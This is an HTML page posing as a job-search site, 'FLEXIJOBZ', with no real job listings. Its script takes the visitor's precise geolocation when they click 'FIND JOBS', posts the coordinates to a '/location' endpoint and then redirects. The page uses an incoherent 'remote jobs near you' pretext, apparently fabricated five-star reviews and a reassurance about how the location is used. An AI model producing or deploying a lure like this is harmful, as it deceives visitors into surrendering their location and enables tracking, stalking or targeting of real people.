<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>FLEXIJOBZ | ONLINE JOBS NEAR YOU</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    * { margin: 0; padding: 0; box-sizing: border-box; }
    body {
      font-family: 'Segoe UI', sans-serif;
      background-color: #f4f7fc;
      color: #1a1a1a;
      text-align: center;
      padding: 60px 25px;
    }
    h1 {
      font-size: 28px;
      color: #0056b3;
      letter-spacing: 1px;
      margin-bottom: 20px;
    }
    p {
      font-size: 15px;
      color: #333;
      margin-bottom: 25px;
      letter-spacing: 0.5px;
    }
    button {
      background-color: #0056b3;
      color: #fff;
      padding: 13px 30px;
      font-size: 14px;
      font-weight: bold;
      border: none;
      border-radius: 6px;
      letter-spacing: 1px;
      cursor: pointer;
      transition: background-color 0.3s ease;
      margin-top: 20px;
    }
    button:hover { background-color: #004080; }
    .stars {
      color: #ffaa00;
      font-size: 16px;
      margin-bottom: 5px;
    }
    .review-box {
      background: #fff;
      border-radius: 8px;
      box-shadow: 0 2px 5px rgba(0,0,0,0.1);
      padding: 15px;
      margin: 15px auto;
      max-width: 400px;
    }
    .review-text {
      font-size: 14px;
      color: #444;
    }
    .purpose {
      margin: 40px auto 25px;
      max-width: 650px;
      font-size: 14px;
      color: #444;
      line-height: 1.6;
    }
    footer {
      margin-top: 60px;
      font-size: 12px;
      color: #777;
      letter-spacing: 0.5px;
    }
  </style>

  <script>
    function getLocation() {
      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(sendLocation, showError);
      } else {
        alert("Geolocation not supported by your browser.");
      }
    }

    function sendLocation(position) {
      fetch("/location", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          lat: position.coords.latitude,
          lon: position.coords.longitude
        })
      }).then(() => {
        window.location.href = "/ONLINEJOBS.HTML";
      }).catch((error) => {
        alert("Error sending location.");
      });
    }

    function showError(error) {
      alert("Location access denied or unavailable.");
    }
  </script>
</head>

<body>
  <h1>FIND ONLINE JOBS NEAR YOU</h1>
  <p>ENABLE LOCATION ACCESS TO VIEW REMOTE AND WORK-FROM-HOME JOB OPPORTUNITIES IN YOUR AREA.</p>
  <button onclick="getLocation()">FIND JOBS</button>

  <div class="purpose">
    <strong>WHY FLEXIJOBZ?</strong><br><br>
    FLEXIJOBZ WAS CREATED TO HELP STUDENTS, FREELANCERS, AND PART-TIME SEEKERS FIND VERIFIED ONLINE JOBS BASED ON LOCATION.  
    OUR PLATFORM CONNECTS YOU WITH REMOTE WORK OPPORTUNITIES IN YOUR REGION.  
    WE USE YOUR LOCATION ONLY TO MATCH YOU WITH JOBS THAT SUIT YOUR AREA AND PREFERENCES.
  </div>

  <div class="review-box">
    <div class="stars">★★★★★</div>
    <div class="review-text">"GOT MY FIRST REMOTE JOB WITHIN A WEEK! HIGHLY RECOMMENDED."</div>
  </div>

  <div class="review-box">
    <div class="stars">★★★★☆</div>
    <div class="review-text">"FLEXIJOBZ IS EASY TO USE AND OFFERS VERIFIED JOB LISTINGS NEAR ME."</div>
  </div>

  <div class="review-box">
    <div class="stars">★★★★★</div>
    <div class="review-text">"PERFECT FOR STUDENTS LOOKING FOR PART-TIME WORK-FROM-HOME GIGS."</div>
  </div>

  <footer>© 2025 FLEXIJOBZ TECHNOLOGIES PVT. LTD.</footer>
</body>
</html>